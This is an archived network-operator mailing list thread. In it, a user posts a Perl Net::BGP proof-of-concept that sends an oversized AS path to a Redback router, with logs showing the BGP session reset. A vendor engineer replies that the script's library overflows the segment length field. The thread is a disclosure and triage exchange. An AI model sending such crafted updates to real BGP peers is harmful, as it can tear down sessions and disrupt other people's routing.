[rbak-nsp] New old BGP issue.

Jeff Tantsura jeff.nsp at gmail.com
Sat Dec 3 19:56:37 EST 2011 

Pawel,

That's a different error.
The PERL module has a bug.
It has an aspath segment of length 0.
The path segment length field is one byte and it attempted to put 256 ASNs into a single path segment.
The length field overflowed.
The aspath really is malformed.

You might want to capture the update and analyze it. 
Please try a real router...

In general - before accusing anyone of misbehaving - have a solid prove that this is really the case.

Cheers,
Jeff

On Dec 2, 2011, at 10:44 PM, Pawel Jarosz wrote:

> On Fri, 2 Dec 2011, Jeff Tantsura wrote:
> 
>> Hi Pawel,
>> 
>> SEOS has been treating this condition (AS path longer than 255) as withdraw
>> since 2003.
>> Could you please provide access to the PoC?
>> 
>> Thanks!
> Hi Jeff,
> its' simple perl Net::BGP based script,
> first install Net::BGP from CPAN.
> Set up simple BGP session 9prefered in separate context),
> in my environment between 10.0.0.1 (bgpd) and 10.0.0.1 (redback)
> This behavior was analysed, such situation happened in 2008, and
> same packets were generated form quagga.
> 
> Redback:
> 
> router bgp 65530
>  address-family ipv4 unicast
> !
>  neighbor 10.0.0.2 external
>    remote-as 65531
>   address-family ipv4 unicast
> 
> Perl:
> ------------------------------------ #!/usr/bin/perl
> #BGP Test daemon by Pawel Jarosz <pj at hostersi.pl>
> 
> use Net::BGP::Peer;
> use Net::BGP::Update;
> use Net::BGP::ASPath;
> use Net::BGP::Process;
> 
> #Connect parameters
> $LOCAL='10.11.0.254';
> $LOCAL_AS=65531;
> $REMOTE='10.0.0.1';
> $REMOTE_AS='65530';
> 
> $peer = Net::BGP::Peer->new(
>    Start    => 1,
>    ThisID   => $LOCAL,
>    ThisAS   => $LOCAL_AS,
>    PeerID   => $REMOTE,
>    PeerAS   => $REMOTE_AS,
>    Listen   => 0,
>    Passive  => 0,
> );
> 
> sub  sec_update_timer {
>   $update = Net::BGP::Update->new(
>       NLRI            => [ qw( 1.1.1.1/24  ) ],
>       # For Net::BGP::NLRI
>       Aggregator      => [ $LOCAL_AS, $LOCAL ],
>       #Oversized as-path goes here...
>       AsPath          =>  Net::BGP::ASPath->new("$LOCAL_AS "x256),
>       AtomicAggregate => 1,
>   #    Communities     => [ qw( 64512:10000 64512:10001 ) ],
>   #    LocalPref       => 100,
>   #    MED             => 200,
>       NextHop         => $LOCAL,
>       Origin          => INCOMPLETE,
>   );
>   $peer=shift;
>   $estab   = $peer->is_established();
>   print "Established: $estab\n";
>   if (!$estab) {
>      $peer->start();
>      return;
>   }
>   print "Sending update...\n";
>   $peer->update($update);
> }
> 
> $bgp  = Net::BGP::Process->new();
> 
> $bgp->add_peer($peer);
> $peer->start();
> $peer->add_timer(\&sec_update_timer, 5);
> 
> print "Starting loop...\n";
> $bgp->event_loop();
> print "Done...\n";
> -------------------------------------------------
> 
> Start the script.
> 
> In my logs:
> 
> Dec  2 11:21:48 10.0.0.1 Dec 2 10:21:48.239: [0001]: %BGP-7-UPDATE: 10.0.0.2 rcv UPDATE, 549 bytes
> Dec  2 11:21:48 10.0.0.1 Dec 2 10:21:48.239: [0001]: %BGP-7-UPDATE: 10.0.0.2 rcv invalid as path segment length 0
> Dec  2 11:21:48 10.0.0.1 Dec 2 10:21:48.239: [0001]: %BGP-7-UPDATE: 10.0.0.2 malformed aspath, 514 bytes - aspath dump
> Dec  2 11:21:48 10.0.0.1
> Dec  2 11:21:48 10.0.0.1 0    02 00 ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 16    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 32    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 48    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 64    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 80    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 96    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 112    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 128    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 144    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 160    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 176    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 192    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 208    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 224    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 240    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 256    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 272    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 288    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 304    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 320    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 336    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 352    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 368    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 384    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 400    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 416    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 432    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 448    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 464    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 480    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 496    ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
> Dec  2 11:21:48 10.0.0.1 512    ff fb
> Dec  2 11:21:48 10.0.0.1
> Dec  2 11:21:48 10.0.0.1 Dec 2 10:21:48.240: [0001]: %BGP-6-INFO: 10.0.0.2 DOWN - Notification sent
> Dec  2 11:21:48 10.0.0.1 Dec 2 10:21:48.240: [0001]: %BGP-6-INFO: 10.0.0.2 send NOTIFICATION: 3/11 (update: malformed ASPATH) with 518 byte data. mxReadMs=5016
> 
> Regards,
> 	Pawel
> 
> --
> Pawel Jarosz (PJ2179-RIPE)
> Hostersi, Rybnik, Dworek 23, tel. 0 801 000 601
> e-mail: pj at hostersi.pl, http://www.hostersi.pl/
> 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://puck.nether.net/pipermail/redback-nsp/attachments/20111203/7a3efd46/attachment-0001.html>

More information about the redback-nsp mailing list